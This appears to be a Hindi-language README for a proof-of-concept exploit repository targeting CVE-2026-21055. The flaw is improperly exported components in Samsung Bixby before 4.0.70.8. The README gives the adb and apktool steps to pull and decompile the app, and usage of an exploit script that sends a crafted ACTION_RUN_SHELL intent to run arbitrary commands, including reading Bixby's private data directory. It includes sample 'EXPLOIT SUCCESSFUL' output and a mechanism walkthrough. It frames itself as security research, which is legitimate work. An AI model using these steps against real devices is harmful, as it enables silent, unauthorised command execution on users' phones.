
CVE-2026-21055 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Samsung Bixby में अनुचित रूप से निर्यात किए गए Android घटकों के माध्यम से मनमाना कमांड निष्पादन प्रदर्शित करता है। इसमें घटक विश्लेषण और Intent-आधारित आक्रमण स्क्रिप्ट शामिल हैं।
CVE-2026-21055 के लिए प्रूफ ऑफ कॉन्सेप्ट: सैमसंग बिक्सबी में संस्करण 4.0.70.8 से पहले Android एप्लिकेशन कंपोनेंट्स का अनुचित एक्सपोर्ट, स्थानीय हमलावरों को बिक्सबी विशेषाधिकार के साथ मनमाने कमांड निष्पादित करने की अनुमति देता है।
इस रिपॉजिटरी में दो Python स्क्रिप्ट शामिल हैं:
analyze_components.py — डिकंपाइल किए गए AndroidManifest.xml को पार्स करके एक्सपोर्टेड activities, services, receivers और providers को सूचीबद्ध करता है। बिना permission गार्ड के एक्सपोर्ट किए गए कंपोनेंट्स को फ्लैग करता है।
exploit.py — adb shell am के माध्यम से बिक्सबी के एक्सपोर्टेड कमांड रिसीवर को एक निर्मित broadcast Intent भेजकर Intent-आधारित हमले का प्रदर्शन करता है, और बिक्सबी के सिस्टम-स्तरीय विशेषाधिकारों के साथ एक कमांड निष्पादित करता है।
| फ़ील्ड | मान |
|---|---|
| CVE ID | CVE-2026-21055 |
| Samsung SVE | SVE-2026-0917 |
| CVSS v4.0 | 8.5 — उच्च |
| CWE | CWE-926 — Android एप्लिकेशन कंपोनेंट्स का अनुचित एक्सपोर्ट |
| प्रभावित ऐप | Samsung Bixby (com.samsung.android.bixby.agent) |
| प्रभावित संस्करण | < 4.0.70.8 |
| फिक्स किया गया संस्करण | 4.0.70.8 |
| हमला वेक्टर | स्थानीय (उसी डिवाइस पर दुर्भावनापूर्ण ऐप) |
| आवश्यक विशेषाधिकार | कोई नहीं |
| उपयोगकर्ता इंटरैक्शन | कोई नहीं |
| प्रभाव | बिक्सबी विशेषाधिकार के साथ मनमाना कमांड निष्पादन |
डिवाइस से बिक्सबी APK पुल करें और उसे डिकंपाइल करें:
# Find Bixby's APK path
$ adb shell pm path com.samsung.android.bixby.agent
# Pull the APK
$ adb pull <apk_path> bixby.apk
# Decompile with apktool
$ apktool d bixby.apk -o bixby_decompiled -f
विश्लेषण स्क्रिप्ट चलाएँ:
$ python3 analyze_components.py --manifest bixby_decompiled/AndroidManifest.xml
या स्क्रिप्ट को स्वचालित रूप से डिकंपाइल करने दें:
$ python3 analyze_components.py --apk bixby.apk
$ python3 exploit.py --list
# Default: execute 'id' command
$ python3 exploit.py
# Custom command
$ python3 exploit.py --command "ls /data/data/com.samsung.android.bixby.agent/"
# Specify a custom component (if auto-detection fails)
$ python3 exploit.py --component com.samsung.android.bixby.agent/.receiver.CommandReceiver
============================================================
CVE-2026-21055 PoC — Samsung Bixby Command Execution
Improper Export of Android Application Components
============================================================
[*] Target package: com.samsung.android.bixby.agent
[*] Bixby version: 4.0.69.2
[*] Vulnerable: YES (< 4.0.70.8)
[*] Bixby UID on this device: 10xxx
[*] Executing exploit...
[*] Crafting exploit Intent...
Component: com.samsung.android.bixby.agent/.receiver.CommandReceiver
Action: com.samsung.android.bixby.agent.ACTION_RUN_SHELL
Command: id
Output: /data/local/tmp/bixby_poc_output
[+] Intent sent.
[+] Command output (executed with Bixby privilege):
uid=10xxx(u0_aXXX) gid=10xxx(u0_aXXX) groups=10xxx(u0_aXXX),3003(inet),9997(everybody)
[+] EXPLOIT SUCCESSFUL — command executed with Bixby privilege
[+] Verify the output UID matches Bixby's UID: 10xxx
कंपोनेंट एक्सपोर्ट: बिक्सबी एक या अधिक कंपोनेंट्स (services/receivers) एक्सपोर्ट करता है जो कमांड निष्पादन या ऑटोमेशन ट्रिगर को संभालते हैं। ये कंपोनेंट्स android:exported="true" के साथ एक्सपोर्ट किए जाते हैं, लेकिन बिना android:permission एट्रिब्यूट या रनटाइम अनुमति जांच के।
Intent वितरण: डिवाइस पर कोई भी ऐप इन एक्सपोर्टेड कंपोनेंट्स को एक Intent भेज सकता है। Intent एक एक्शन स्ट्रिंग (जैसे, ACTION_RUN_SHELL) और स्ट्रिंग एक्स्ट्रा ले जाता है, जिसमें निष्पादित किए जाने वाले कमांड और एक आउटपुट फ़ाइल पथ होता है।
कमांड निष्पादन: बिक्सबी का एक्सपोर्टेड कंपोनेंट Intent प्राप्त करता है, कमांड निकालता है, और उसे Runtime.exec() या इसी तरह के तंत्र के माध्यम से निष्पादित करता है। कमांड बिक्सबी के प्रोसेस कॉन्टेक्स्ट में चलता है और बिक्सबी की सभी सिस्टम-स्तरीय अनुमतियाँ विरासत में लेता है।
कोई उपयोगकर्ता इंटरैक्शन नहीं: एक्सप्लॉइट को किसी उपयोगकर्ता इंटरैक्शन की आवश्यकता नहीं होती। दुर्भावनापूर्ण ऐप पृष्ठभूमि में चुपचाप Intent भेज देता है।
यह PoC केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। केवल उन्हीं डिवाइसों पर परीक्षण करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण है। मालिक की सहमति के बिना इस एक्सप्लॉइट का उपयोग डिवाइसों के विरुद्ध न करें।